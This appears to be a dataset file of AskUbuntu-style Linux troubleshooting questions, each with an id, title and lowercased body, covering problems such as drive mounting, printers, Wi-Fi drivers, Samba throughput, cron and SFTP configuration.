500647	unable to mount ntfs external hard drive	i am having trouble mounting my external hard drive , every time i try and do so i get the following message : '' error mounting /dev/sdb1 at /media/fuzzy27/my book : command-line `mount -t `` ntfs '' -o `` uhelper=udisks2 , nodev , nosuid , uid=1000 , gid=1000 , dmask=0077 , fmask=0177 '' `` /dev/sdb1 '' `` /media/fuzzy27/my book '' ' exited with non-zero exit status 13 : $ mftmirr does not match $ mft ( record 0 ) . failed to mount '/dev/sdb1 ' : input/output error ntfs is either inconsistent , or there is a hardware fault , or it 's a softraid/fakeraid hardware . in the first case run chkdsk /f on windows then reboot into windows twice . the usage of the /f parameter is very important ! if the device is a softraid/fakeraid then first activate it and mount a different device under the /dev/mapper/ directory , ( e.g . /dev/mapper/nvidia_eahaabcc1 ) . please see the 'dmraid ' documentation for more details . '' how do i go about or what do i need to do in order to fix this error/problem without losing any of the data on my hard drive ? is there no other way of fixing it without having to reinstall windows or finding someone using windows ?
500650	evolution mail client for ubuntu 12.04	i am facing the following issue : when i attach 1 or 2 mails ( which already have some attachment say word or excel file ) as attachments in any mail through evolution mail client for ubuntu 12.04 , the receiver is not able to open the attachments ( word or excel files ) in the attached mail . please provide solution urgently .
500652	reload keyboard shortcuts	each time i suspend and then resume on my acer c720 , unity loses my custom keyboard shortcuts . i 'm talking about these : i use them because that 's where the associated keys on a chromebook are . is there a command that i can run on each resume , that would force unity to reload the shortcuts defined in settings - > keyboard - > shortcuts ? ( i know where to place those scripts , and i can edit your answer to include that part . i just need the command that would re-read the shortcuts . )
500658	permission denied when starting android sdk	i have been developing android apps on windows but setting up my pc to develop android apps has been very daunting on ubuntu 14.04 . i followed the steps from this tutorial at xda-developers but on the step `` setup adb/fastboot '' when i run this command in the terminal $ sudo ./android i get the error message ./android : 1 : ./android : java : permission denied ./android : 1 : ./android : java : permission denied ./android : 110 : exec : java : permission denied please what do i have to do ?
500660	uploading website images	i 've started om a website and i need to know where i can upload images , does filezilla client do this ? i know server does but on the interwebs no one really has much to say otehr than if you want to connect to a server go server , if you want to connect to a client go client ( like that 's not obvious ) , so what should i use to upload my images so i can just put in a url in my img src= '' `` so it will show up on anyone 's computer .
500663	vnstat not updating	i installed vnstat on my ubuntu 14.04 server to track my internet usage ( i have a limited monthly transfer ) . the database never updates , however . i 've tried uninstalling/reinstalling , but that does n't work . what do i need to do to get vnstat to update and be accurate ?
500666	disable 'esc ' and 'shift + tab ' history shortcuts in terminal	when in a bash terminal , if i hit esc or shift + tab the command line goes to the history where i can move around to previous bash commands with vi-like bindings . i get messed up when in this mode since i will unintentionally run various commands . i can only get out of this by hitting a or i. i hit esc and shift + tab frequently ( though , accidentally ) in my normal usage and i would like to disable this history search mode altogether . edit : the event also occurs when i hit any of f1 through f12 ( except f4 and f11 ) , pause/break , delete , home , pgup , and pgdn . i 'm beginning to think it 's related to unbound keys or perhaps something weird with my keyboard .
500670	virtualbox is crashing ( bsod ) on windows guests . please suggest me something else	virtualbox is crashing windows guests . ( i have started to hate virtualbox . ) my desktop is old and does not have hardware acceleration or virtualization technology . i have searched a little about that but not sure about anything in particular . i am using ubuntu 14.04 with lxde and will be running windows amd mac guests too . i am beginner in ubuntu . please help . thanks .
500674	ca n't install any softwares through software center nor packages or get update	i just installed ubuntu 12.10 i386 . i am a newbie and does n't know much about ubuntu but what to learn . after intallation , i tried sudo apt-get update and sudo apt-get install < package > . when i do sudo apt-get update in the terminal , a bunch 404 errors pop up and at last : e : some index files failed to download.they have been ignored or old ones used instead . when i tried to install apps through ubuntu software center , the following pops up : failed to download repository information check your internet connection i can use internet with mozilla , what is the problem ?
500677	installing slowmovideo on 14.04 when only saucy package is available	i like to install slowmovideo . but on launchpad there is no ppa for ubuntu 14.04 ( trusty ) . the latest supported ppa is for 13.10 . what options ( if any ) do i have to install the software on my ubuntu 14.04 ? the doku for compiling the software says for the required packages : apt-get install build-essential cmake git ffmpeg libavformat-dev libavcodec-dev libswscale-dev libqt4-dev freeglut3-dev libglew1.5-dev libsdl1.2-dev libjpeg-dev libopencv-video-dev libopencv-highgui-dev opencv-dev but ubuntu normaly uses avconv . i 'm not shure if i brake any other video or image editing software by installing those packages .
500679	block a command from sudo user	i do n't need an administrator to change my root password . i do n't want any sudo user to execute this command : sudo passwd $ root i have tried it in the sudoers file using the following command : % sudo all= ( all ) all , ! /usr/bin/passwd $ root how can i block it ?
500680	find where your files are being used	im running a server with no gui . is there a way to find where my files are being called ? i want to know which files are calling my /bin/auto-root-login . i want to know this because my system uses this file to autologin to a console . so my tty1 logs into root . if i change contents of /bin/auto-root-login from root to user then it autologins to user . i have tried editing /etc/init/tty1.conf and this does not fix autologgin issues .
500683	how to debug gnome hangs ?	in the last day , my system running 14.04 has started to hang for ~10 seconds after seemingly common actions : editing a url in chrome , changing to a different workspace , etc . the `` perpetrators '' seem to be high memory consumers : chrome and intellij idea - but the hangs occur even when memory usage is relatively low ( ~30 % ) , but only when one of these programs is open . the symptoms are : i change workspaces or click on some interactive element hang starts , can move mouse , but can not interact with anything stare angrily at my computer for the next ten seconds hang ends , resume work the gnome logs only mention one seemingly benign problem . this is starting to drive me crazy , though . continually being unable to type that thing you just figured out after switching workspaces is one of the more frustrating experiences i 've had in ... too long ... so , any ideas on debug strategies for this problem ?
500684	completely uninstall xampp if not installed from apt-get	i 've downloaded xampp from their website . and then manually installed it from my home directory and it is installed in /opt/lampp i 've made tons of changes and i do n't remember how to revert back to it 's default state , so i need a fresh new clean install . besides doing sudo /opt/lampp/lampp stop and sudo rm -r /opt/lampp . is there anything else that i should delete ? maybe from files that it might used from home directory ? apart from that . does doing above completely remove xampp from my system ?
500685	e : dpkg was interrupted , you must manually run 'dpkg -- configure -a ' to correct the problem	was copy/paste from `` things to do after installing lubuntu 14.94 in the terminal a microsoft eula presented -- could not find a way to `` ok '' or even move on from there . since then the above noted issue . couple of restarts and shutdowns wait several minutes with boot ; tried get-apt clean and get-apt auto remove issue remains . thx for help larry p.s . first time using this . samsung nb30plus netbook
500686	can i make the gnome 3 overlay show the current wallpaper rather than the wallpaper on login ?	i 'm using gnome 3 ( gnome shell 3.10.4 ) and i have a script that changes the wallpaper using gsettings set org.gnome.desktop.background picture-uri < file > . this works just fine with regards to the wallpaper itself , but whenever you open the overlay ( click activities/super/hot corner ) the wallpaper in the background is the wallpaper that was there when i logged in rather than the current one . it 's not a big deal i suppose , but it makes for a significantly more jarring change than it otherwise would be ( especially as it changes on 3 monitors simultaneously ) . is there any way i can set the wallpaper shown on this overlay or just notify it in some way that it has changed so it can invalidate whatever cache its using ? if it makes any difference , the script actually always sets the wallpaper to the same path ( /tmp/wallpaper.png ) just to make the shell re-read it as this is a temporary file that is really a combination of multiple other wallpapers that gets constructed on-the-fly .
500687	problems with creating a raid 5 array	when ever i try creating a raid setup with the disck utility it gives me the following error : error creating raid array : error spawning command-line `mdadm -- create /dev/md127 -- run -- chunk 512 -- level raid6 -- name `` storage '' -- raid-devices 4 `` /dev/sda '' `` /dev/sdc '' `` /dev/sdd '' `` /dev/sdf '' ' : failed to execute child process `` mdadm '' ( no such file or directory ) ( g-exec-error-quark , 8 ) ( udisks-error-quark , 0 ) it appears that i am missing the mdadm library
500689	pop3 access to a postfix based email system using courier	i am trying to use courier-pop so i can access my email from 3rd party email clients such as gmail that rely on pop3 based methods . i am recieving connection timeout errors trying to connect to my domain via pop3 , however i am wondering if my settings are correct or not . what should i be using for the username and password ? should this be the linux username and password ? and is the pop server location just wherever the mx record points to ? the courier config suggests the port is 110 . i am just confused as to what the settings are for using courier . i am unable to telnet to the localhost on the pop port however : [ 2106 ] $ telnet 127.0.0.1 110 trying 127.0.0.1 ... connected to 127.0.0.1 . escape character is '^ ] ' . connection closed by foreign host .
500691	how to view multiple juju environment on juju-gui	i 've added 2 environment on juju called them en01 and en02 of type maas , is there a way to view/select them on juju-gui to manage the services deployed ? thanks
500692	ubuntu 14.04 bios update	ok . so . in my attempt to install ubuntu 14.04 for dual booting on my toshiba satellite c55t somehow the install disk wiped my hard drive before i ever even gave the ok to install . so i had to just install ubuntu 14.04 on the computer and windows is no longer on it . i want to get windows back on it . here 's the problem . the bios version i currently have is 1.10 so it does not have the csm boot option under the advanced system configuration in the bios screens . so the computer has booted a few things from cds and usb drives , but it will not boot any windows isos that i have tried . it did boot the iso that i created for updating the bios to 1.30 , but it wo n't actually execute the bios flash , because apparently the application is not supported so it wo n't execute the flash . is there any surefire way to install some version of windows without the csm boot option ? if not , how can i update the bios to 1.30 with ubuntu 14.04 ? please let me know . also why does n't toshiba have the csm boot option on bios 1.10 ? it 's ridiculous . please help ! i do n't just want a linux machine .
500693	how to complete a svn commit process inside the terminal ?	i am a begineer at using svn and linux . i want to remove the test files from the repository url . these files were added by the import command . now when i remove these files from the local svn dir using the 'svn delete ' command , it is done successfully . now its time to perform the commit , here lies the problem , i enter the svn commit command and it displays the list of all the actions that need to be performed during the commit . files which are to be added or deleted or whatever action has to be done . i get stuck here and i do not know what to do to complete the commit . can anybody help please ?
500694	how can i make it so i can run a specific program , just by typing its name in the console ?	i have just recently installed light table downloading it from the git repository , and followed the instructions on this website to create a desktop launcher . now i want to run the program by directly typing in the terminal lighttable and not ./opt/lighttable/deploy/lighttable
500697	virtualbox : usb sticks not recognized ( windows xp as guest ; ubuntu 14.04 as host )	i have installed virtualbox on ubuntu 14.04 and installed windows xp as a guest . i have a usb stick and an external drive ( western digital ) that i want to mount in win xp . the mounting itself works , but windows xp displays : `` usb device not recognized '' and of course i can not access it . here is what i have already done : ( got windows xp updates ) installed guest additions installed the extension pack added user to virtualbox group enabled usb controller + usb 2.0 ( ehci ) controller added filters for both , my usb stick and my wd extenal harddrive set it to use only 1 cpu ( settings - > system - > processor )
500701	problem setting up dial up internet connection	i can not use my broadband connection . since i have lost the wired connection option ( see here ) , i can not manually input my isp name and password . i tried with this link , which recommended me to run this command : dpkg -s pppoeconf which shows my pppoeconf is ok and installed . but then ( in order to set up the dial up ) , the command : sudo apt-get install pppoeconf wo n't work . how can i solve this ?
500704	laptop battery draining faster without overheating issue	i have a hp laptop with an amd graphics card and i have installed ubuntu 14.04 alongside my window 8.1 . under ubuntu the laptop is quiet silent and smooth ( no overheating ) but the battery is draining very fast . it only last for one hour max . in windows it lasts for ~2.5 hours .
500706	is this bug/how to fix wrong entry , in classic menu indicator ?	i found `` hardware lister '' as application in classic menu indicator as follows : then i tried to check that entry via `` main menu '' ( alacarte ) but not found as follows : here you can see between displays and input method , there is no such `` hardware lister '' application ! i 've also checked by searching in dash application but no such application found ! is this bug ? ( what is going wrong ? ) how can i fix this ? note : when i click on that application from classic menu indicator , nothing happens .
500711	can i decrease the ipv4 transmit delays in ubuntu 14.04 for rdp on a kvm guest running over a bridge ?	i 'm trying to run windows 2008 r2 as a guest with kvm . a basic kvm setup with a bridge for guests . when using remote desktop to the windows guest , the screen redraws/updates are only fast if the mouse is moving over the rdp window . if i stop moving the mouse over the window the screen redraws/updates continue at a slow 1 second interval or so . this does not happen outside of the kvm environment . the actual problem , if i move the mouse cursor during a guest rdp logon over the guest rdp window or the kvm host rdp window the guest logon only takes 40 seconds , but if the mouse is stationary during logon it can take 3 minutes . there seems to be a delay in transmission of packets if there is no incoming packet to trigger more frequent updates , and is adversely affect the rdp session logon time . i am unable to find any answers on-line and any help would be appreciated . thanks !
500712	how to fit the display into external monitor without title and menu bar being pushed outside the screen ?	just got ubuntu and and seeing as how my laptop screen is broken i have to use an external monitor . how do i fit the display into external monitor without title and menu bar being pushed outside the screen ? i 've tried all the resolution options without any luck . added an image to show the option which offers the most of the bars .
500715	hdmi tv issues with acer v3-571 laptop	im a complete linux novice . iv installed mint today on my laptop . so far so good . however im having a few teething issues with regards to my hdmi connection . when i connect to my tv via hdmi the tv displays the image with a section missing all the war around . the image fits the whole panel but it is not the complete image . in win 7/8 i was able to go into advanced settings and make a custom resolution which solved this . the second issue is that there is no sound to the tv . right clicking on the sound icon in the system tray does n't reveal anything . if i click configure there is no option to switch between audio devices ( laptop/tv ... ) . ideally i had hoped this would happen automatically as it did in the last 2 versions of windows . is there a way to set ubuntu/mint up to solve these issues ? thanks .
500717	ubuntu graphics driver / screen resoloution problem	i have an old laptop that i installed ubuntu on from windows xp previously . after the installation i noticed the screen resolution is wrong and not all of the screen fits on the display . after researching this , i have ran : lshw -c video and obtained the following output : *-display unclaimed description : vga compatible controller product : 771/671 pcie vga display adapter vendor : silicon integrated systems [ sis ] physical id : 0 bus info : pci @ 0000:01:00.0 version : 10 width : 32 bits clock : 66mhz capabilities : vga_controller cap_list configuration : latency=0 resources : memory : c0000000-cfffffff memory : d4000000-d401ffff ioport:9000 ( size=128 ) i am a complete newbie to linux/ubuntu and not sure what to do to fix my display . after i fix the ability to see things correctly , i hope i can learn the system more easily . as such , any help would be gratefully received to help me get past the first hurdle . crudly , i think the problem is simply that i do not have the correct graphics driver for the system and need to upgrade/install one . problem : which one and how ? i never had this problem when the laptop ran windows xp . thanks
500724	what is difference between arping and arp ?	guys am having a mysterious doubt in diff . b/w arping and arp . when my senior asked me i was speechless . pls . help me am confused .
500726	how to approach legibility problem of light text in dark gtk theme	i 'm working on a dark gtk theme for ubuntu . this largely is going well , but i am not sure how to deal with certain scenarios such as instances of programs with a light colour scheme . a representative example is the ubuntu software centre . you can see below that the light coloured text is difficult to read against the light background of ubuntu software centre : given that a dark theme ( i.e. , general dark colours in the theme with light text ) is necessary for my purposes , what would be some reasonable way to approach this legibility problem ?
500728	configure samba to fully use a gigabit connection	is there a way to configure samba in a way so that it can actually fully use a gigabit lan connection when only performing a single big ( > 10gb ) file transfer ? on several ubuntu servers in several networks i never achieved file transfer speeds of more that about 30-40 mbyte/s . and this is true for reading and writing , and with windows and linux clients . i already checked/tested the following : network connection : iperf shows > 950 mbit/s even in tcp mode hard disk speeds : the servers can copy files at > 150 mbyte/s locally , and `` top '' shows `` waiting '' cpu load of below 1 % , so processes are not waiting for slow i/o . one server has a five disk raid5 array , but even on that machine read access through samba does not go above 30-40 mbyte/s cpu load : the total cpu load during copying is less than 20 % , so it does not even fully use a single cpu core of these dual core servers mtu size : the servers all have an nforce mcp61 chipset . apparently , one can not change the ethernet mtu size for these nics on linux to anything above 1500 . yet , it seems unlikely that that 's the culprit , as iperf is able to achieve transfer speeds of almost 1 gbit/s despite the mtu size of 1500. various socket options in the smb.conf : the usual suspects seem to be tcp_nodelay , so_rcvbuf=8192 and so_sndbuf=8192 . none of those helped , some combinations actually halved samba transfer speeds . also , the consensus seems to be that modern ( > = 2.6 ) linux kernels do not require tuning of socket options . are there any other options i missed ? i am specifically interested in tuning samba . i know that alternatives such as nfs exist , but smb is the only alternative that works on all clients that are relevant to me ( windows and linux pcs , android smartphones , hardware mediaplay devices , etc . )
500730	no desktop only blank screen	i started my laptop this morning and after login there is only a black screen . i tried to re-install the desktop , but it did n't work . when i rebooted the machine with shift key pressed it displayed configure drivers manually i have an intel graphics card in my hp g62 running ubuntu 14.04 .
500736	stored iscsi information target in ubuntu 14.04 boot	we are doing some testing with iscsi boot of ubuntu server 14.04 on a large bed of diskless clients . we installed one client to an iscsi target rbd_base and then shut down and cloned the volume and attached to a second iscsi target rbd00 . we then booted a client from the cloned copy , which begins boot ok , but when the client os brings up the iscsi initiator it still attaches to the original target : iscsistart : logging into rbd_base 10.0.0.3:3260,1 boot succeeds , but obviously we can not boot multiple clients this way , theyâd all end up using the same target . it would presumably be simple to adjust the boot sequence to the new target if i can find out where the target information is stored . however inspection of the system and a lot of googling havenât led me to any answers . can anyone tell me where iscsi boot information is stored on an ubuntu server 14.04 , or how to adjust it ? then i can either hard-code the appropriate target or set it to dynamically adjust using ibft .
500738	printer not found	i set up my kodak printer and it was working a couple of days , this morning i went to print and it could n't find the printer . i tried to reinstall but it now ca n't find it at all . do i have to clear out anything or should i try again but with a usb cable first ?
500740	upgrading from ubuntu 12.04 lts	i am having troubles while trying to upgrade from ubuntu 12.04 lts . using `` update manager - > new ubuntu 12.10 can be installed . upgrade '' gives me error ( translated into english myself ) download failed . upgrade could n't be downloaded , there may be a problem on network . and then is this issue you are reporting one you encountered when upgrading ubuntu from one release to another ? no yes so i followed the instructions from here http : //www.howtoforge.com/how-to-upgrade-ubuntu-12.04-lts-precise-pangolin-to-12.10-quantal-quetzal-desktop-and-server-p2 , but after run do-release-upgrade part , i still get the same networking error . it is http : //i.stack.imgur.com/5aryy.png ( image ) 404 not found . ip : 91.189.91.14 80 download failed . upgrade could n't be downloaded . there may be a problem on network . i could n't find anything online . maybe someone here can help me . thanks .
500741	what is the amazon browser in 14.04	in a recently installed ubuntu 14.04 , there is an amazon browser in the unity sidebar and a `` browser '' in dash . i do n't know how to find the source and name of these browsers . i 'd expect that they 're based on firefox / seamonkey , but i 'm not sure . thank you .
500744	no actual desktop in ubuntu ( but i do have unity launcher displaying )	i installed ubuntu gnome because that 's what i 'm used to using with fedora but i thought i 'd give a shot to ubuntu 's default desktop , so i installed ubuntu-desktop via apt but now i have the unity launcher and the top/notifications panel but i have no actual desktop and ca n't seem to figure out what is missing ... can anyone lend a hand ? thanks
500745	plop boot menu in ubuntu	i have an old sony laptop that does n't support booting from usb and its cd rom drive is broken . previously i was able to boot from usb through plop boot manager , but recently i deleted partitions and installed zorin os to try it . now i wanted to install xubuntu , but i could not boot from usb since plop boot manager is no longer available given that the mbr was over written by zorin . i tried intalling plop boot menu from zorin , but i was n't able to . i tried different entries but i get error messages like unknown file system/ partition not found ! i am able to run zorin normally .
500749	cron job not running - postfix/sendmail error	here is my content of sudo crontab -e @ hourly /home/username/ntpdate.sh the content of my script ( ntpdate.sh ) //.25 is my ntp server echo `` current time is $ ( date ) , `` > > /home/username/ntpdatelog.txt ntpdate -u 192.168.1.25 > > /home/username/ntpdatelog.txt when i simply run the command by itself , or run the script by itself , it works fine and outputs to the file . the script has correct permissions to run . the error i 'm getting in /var/log/syslog is this : cron [ 6386 ] : ( root ) mail ( mailed 1 byte of output ; but got status 0x004b , # 012 ) postfix/sendmail [ 6410 ] : fatal : open /etc/postfix/main.cf : no such file or directory why is there a mail error when the script does n't need mail ( that i know of ) . i know that ntpdate is deprecated , but it is the only thing that does what i need right now ( assuming i can get cron to run it ) .
500751	bios does n't detect usb device	i have a problem with installing ubuntu alongside windows 8.1 on my acer aspire v7 . i 've created a bootable usb on windows ( with universal usb installer ) , turned off fastboot and secureboot , yet when i press f12 during startup , the usb device is n't an option . i 've tried it with ubuntu 14.04 and xubuntu 14.04 but it does n't matter .
500752	ubuntu wo n't boot after using ubuntu tweak janitor	i ran ubuntu tweak 's janitor function and now ubuntu wo n't start . when i start the computer the screen shows the ubuntu logo screen , then it just goes blank instead of displaying the login screen . ubuntu 12.04 lts on a hp-mini netbook . update : problem solved by following the procedure at ubuntu not booting
500754	dns traffic keeps increasing	i have installed monitorix on my home computer to play around with all these awesome things i can do with ubuntu , and even joined the monitorix mailing list . i had a question regarding how ubuntu processes dns requests after doing some research ( and after the mailing list and google have not provided definate answers . ) i only have 2 ports open to outside traffic - both blocked in ip tables and on my router - a non-standard ssh port is one of the main ones i use . through this i am able to remotely access numerous services - apache httpd , tomcat , stanbol , monitorix , cups , etc etc etc . the question i had here is inbound dns is blocked and filtered out in my ip tables configuration . for some reason , the outbound dns requests my computer sends keeps increasing in a steady fashion - about a week ago my inbound dns was about 425 bytes/second , and right now it is around 700 bytes/second , and increasing . a screenshot of the monitorix page i am observing this is below . i do not believe this to be a bug in monitorix as it appears valid based off ip tables and packets hitting rules for monitorix in ip tables . i was wondering if there is any logical reasoning for this to be occuring - as from what i have read ubuntu does not do dns caching , or maybe it does and i need to flush dns cache or something .
500760	recover ext2 filesystem after reformat ?	i had an ext2 partition and by mistake i reformatted it to ext4 . i immediately noticed the problem because at the next reboot my system would n't mount the reformatted partition , which got a new uuid and therefore did not match the one in /etc/fstab . after reformatting i did not write anything to the disk . is there any chance i can recover the data files on this partition ?
500762	c++ program compiles but doesnt run	the c++ program compiles fine , but i can not run it . it does not give any error message too . it does not even execute the first statement of main ( ) , which is simply an output statement , which i gave as a trial . can anyone please help ?
500763	dualboot with fast startup	i dual-boot ubuntu and windows 8 . i know that if we try to use ubuntu without disabling fast startup in windows , the changes we made on the shared partition will get lost when we boot from windows . will there still be problems if i leave fast startup enabled , but perform a complete shutdown on windows whenever i am going to boot from ubuntu ? it says restart is n't affected in the option to enable/disable fast startup . this is what made me think that i wo n't have a problem if i perform a full shutdown before booting from ubuntu
500765	why does `` esc '' not cancel current operation ( like painting with the mouse ) in gimp 2.8.10 ?	there 's an apparently fixed bug which , alas ! , still bugs me : i 'd like the esc key to cancel the current operation ( like painting with the mouse ) . currently it does n't . anyway to affect the desired behaviour ? alternatively / additionally , are there any other ways ( keyboard and/or mouse ) to cancel the current operation ? why ? cuz oftentimes it ai n't possible to ctrl z undo , and the current drag-drop mouse operation will trigger a lenghty computation ... and possibly destroy/overwrite earlier efforts ...
500766	read/write permissions secondary driver on ubuntu 14.04	i have installed a second driver on ubuntu 14.04 . it is formated as `` ext4 '' and labeled data sudo blkid > /dev/sdb1 : label= '' data '' uuid= '' df065398-cb68-47df-b1ab-abf81916159f '' type= '' ext4 '' and all users have been given rwx rights on it as shown here sudo chmod -r a+rwx /media/mike/data ls -l /media/mike drwxrwxrwx 5 mike mike 4096 juil . 21 20:12 data/ however when i create a new user , it seems that he ca n't have even read the contents of the folder sudo useradd tester sudo passwd tester # we give qq when i log in as tester , nothing he ca n't read the folders under data su tester tester @ mikepc : /home/mike $ ls -l /media/mike/data/testdir i have tested this on my first hard drive and it works . am i overseeing something ? p.s : i have seen on the web that this and similar questions have been asked in this forum and elsewhere : here for example or enter link description here but none of the proposed solution worked for me . the background of this question is that i would like to have a posgresql tablespace on my second driver and i ca n't give the postgres user the right permission to the second driver . ** -- - update -- - ** i could solve the problem by editing directly /etc/fstab i just followed this tutorial please note : in case the sudo mount -a complains that the mount point is not found , you can just create it using sudo mkdir /media/whatever
500767	stuck print jobs	how do i fix print jobs getting stuck in the queue and never printing ? i have an hp color laserjet cp1518 connected to my network . i used to be able to print on ubuntu 12.10 perfectly . it auto-detected the printer on the network and just worked `` out of the box '' . now when i print , i can see the job sitting in the job queue , but nothing ever happens . the printer is still detected and is listed as `` on '' in the printer dialog . i 've tried restarting the cups service and turning the printer on and off , but nothing helps . how do i diagnose this ?
500774	problem upgrading to 14.04 from 13.10	i am trying to upgrade to 14.04 from 13.10 , but i get the following message using the update manager : e : the method driver /usr/lib/apt/methods/htto could not be found . interesting that there is an htto instead of http . could that be the problem ?
500775	permanent path variable	how will i make this /media/de soft/mongodb/bin path variable permanent ? everyone is saying export path= $ path : media/de\ soft/mongodb/bin to your ~/.profile , or .bashrc , or .zshenv depending on your shell . i do n't know what is ~/.profile , or .bashrc , or .zshenv . and what they do actually ? and how will i add export path= $ path : my/path to my .profile/.bashrc/.zshenv ? i 'm using 64 bit ununtu 14.04 lts with default terminal . i 'm very newbie to linux .
500776	how to read bluetooth to the startup files ?	i remember i deleted bluetooth from my startup applications a while ago because i did n't think i 'll need it . now i do and ca n't turn it on . i 'm guessing it 's because of what i did before . how do i fix this ?
500777	how to connect with a qualcomm/huawei 3g modem	i have a 3g modem which lsusb reports as a huawei technologies co. , ltd. e169/e620/e800 modem . however windows ' network connections panel shows it as a qualcomm usb modem 6000 . so when i try to connect to the internet on ubuntu 14.04 , using sakis3g as compiled from here : https : //github.com/trixarian/sakis3g-source , by launching sakis3g with sudo sakis3g and choosing the connect with 3g option , an error box shows with the following error message , modem responded `` error '' while checking for pin . additionally , when i try to connect with network manager , i am told that `` i am now registered on the .. '' , however when i click on the wifi symbol , and click on `` not enabled '' , i see the following error message : connection activation failed ( 1 ) creating object for path '/org/freedesktop/networkmanager/activeconnection/13 ' failed in libnm-glib so how can i get my 3g usb modem working with ubuntu ?
500781	script to automate launch of various terminals and various commands	i am trying to use a script to automate various proccesses when i launch the script . i use this to restart postgresql and metasploit services then launch armitage echo -e `` \033 [ 32mrestarting metasploit services ... \033 [ m '' service postgresql restart & & service metasploit restart echo -- window -- active -e `` \033 [ 32mlaunching armitage ... \033 [ m '' armitage this works fine but i want to open another two terminals at the same time one starting tor and the other starting msfconsole . when i click on the script it asks if i want to run in terminal , i want this to run in terminal automatically without asking . can someone show me how to accomplish this . thanks
500787	lubuntu 14.04 dell inspiron 1501 internal wifi does n't work	i recently installed lubuntu 14.04 on my laptop and i have trouble getting the internal wi-fi hardware to work properly . i can connect to the internet just fine using an ethernet cable or a usb wi-fi adapter . i installed the driver for the internal wi-fi hardware , but when i try to connect to a network , it says no network devices availible .
500789	minecraft frozen	i am having a problem with minecraft on xubuntu 14.04 . i downloaded minecraft 1.7.10 , and it closes the launcher and enters the game . there it gets stuck at the mojang loading screen . i have tried deleting and redownloading the .minecraft folder , and redownloading the launcher as well .
500790	all sftp chroot access is read only ?	these are the pertinent lines from my /etc/ssh/sshd_config subsystem sftp internal-sftp match group sftp x11forwarding no allowtcpforwarding no chrootdirectory % h forcecommand internalsftp the home directory itself is owned by root and the owning group does not have write permissions . then within each home directory is a directory writable by the user . if i sudo -u < user > bash i can write in that writable directory , however if i sftp into it i can not do anything but read the files . it should be noted that if i comment out out the chrootdirectory line above , and sftp in the user can write as he should be able to .
500791	vpn between mac os and ubuntu	i have 2 ubuntu server computer , one with a pubblic ip and one with no public ip ( is behind a fastweb connection ) . i need to connect via ssh to each of this from a mac os pc . i can set a vpn between mac os computer and the two ubuntu server ? how ?
500792	write a script to install an application under wine	i have a non-techy friend who 's giving ubuntu a shot and i 'm basically undertaking the challenge of trying to make it as painless as possible . he would like to install itunes on his machine but i 'd rather he not have to screw around with wine just yet . is there a way that i could write a script that installs itunes under wine for him ? the essence of what i 'm asking is : can software be installed under wine via command line ?
500795	stuck at boot black screen after reboot	i 'm using ubuntu server 14.04 on virtualbox . windows host . not sure if it is related , but i have just installed sendmail and mailutils . after a reboot , it 's stuck at the black console screen , it 's stuck but does n't hand completely . it does not show any error or anything unusual . the last lines of the boot screen say : * stopping log initial device creation [ ok ] * starting load fallback graphics devices [ ok ] * starting load fallback graphics devices [ fail ] * starting set console font [ ok ] * stopping set console font [ ok ] * starting userspace bootsplash [ ok ] * stopping userspace bootsplash [ ok ] * starting send an event to indicate plymouth is up [ ok ] * stopping send an event to indicate plymouth is up [ ok ] * starting mysql 5.6 server [ ok ] * stopping cpu interrupts balancing daemon [ ok ] i can ctrl+alt+f2 to login . everything else works fine but apache , which i can manually start . i have manually upgraded mysql to 5.6 recently . there looks nothing weird in boot.log , dmesg , syslog , etc . except mysql seems to try to continue some upgrade work . however , mysql works fine and startup it self automatically . i tried apt-get update and apt-get upgrade . removed sendmail & mailutils , nothing helps . can anyone give me some hints on how to find out the proper error message ?
500802	wireless networking is faster when lid is open than closed ?	i like to connect my laptop to an external monitor and close my laptop 's lid . however , i noticed something . according to internet speedtests ( and my personal knowledge from downloading large files ) , my wireless networking speed is nearly 10x faster when my lid is open than when my lid is closed ( or more ! ) . how do i make it so my speed is just as fast when the lid is closed ? note : in an internet speed test with the lid open i got about 20 mbps down . in an internet speed test with the lid closed i got about 2 mbps down . note : i am using a gateway ne56r41u if that helps . the gateway ne56r41u is not ubuntu certified . it has a broadcom bcm4313 .
500803	lenovo y40 wirless issues	i can not seem to get the wireless network card working on my lenovo y40 . i am new to linux so i am pretty lost on how to fix this . here is the output of lshw -c network : *-network description : ethernet interface product : rtl8111/8168/8411 pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:03:00.0 logical name : eth0 version : 10 serial : f8 : a9:63:31:30 : fb size : 100mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=full firmware=rtl8168g-3_0.0.1 04/23/13 ip=10.0.1.10 latency=0 link=yes multicast=yes port=mii speed=100mbit/s resources : irq:64 ioport:4000 ( size=256 ) memory : c0604000-c0604fff memory : c0600000-c0603fff *-network disabled description : wireless interface product : wireless 3160 vendor : intel corporation physical id : 0 bus info : pci @ 0000:04:00.0 logical name : wlan0 version : 93 serial : a0:88:69:8e:3e:1a width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=iwlwifi driverversion=3.13.0-24-generic firmware=22.24.8.0 latency=0 link=no multicast=yes wireless=ieee 802.11abgn resources : irq:70 memory : c0500000-c0501fff rfkill list all returns - 0 : ideapad_wlan : wireless lan soft blocked : no hard blocked : yes 1 : ideapad_bluetooth : bluetooth soft blocked : no hard blocked : yes 2 : hci0 : bluetooth soft blocked : no hard blocked : no 3 : phy0 : wireless lan soft blocked : no hard blocked : no
500806	cups problem - printers stop after print several raw jobs	i have three thermal receipt printers connected to xubuntu 14.04 with model generic / text only driver when print command three jobs , one for each printer , sometimes one or two printers stops are left with the job without printing , and the queue print says that the printer is turned off or disconnected . if i send a new print job to the printer that has been standing prints the job that had been printed and the new , but the new print was incomplete . this is used in a restaurant so that these errors can not happen . and i hope you can help me with this problem . cups version : cups 1.7.2-0ubuntu1 amd64
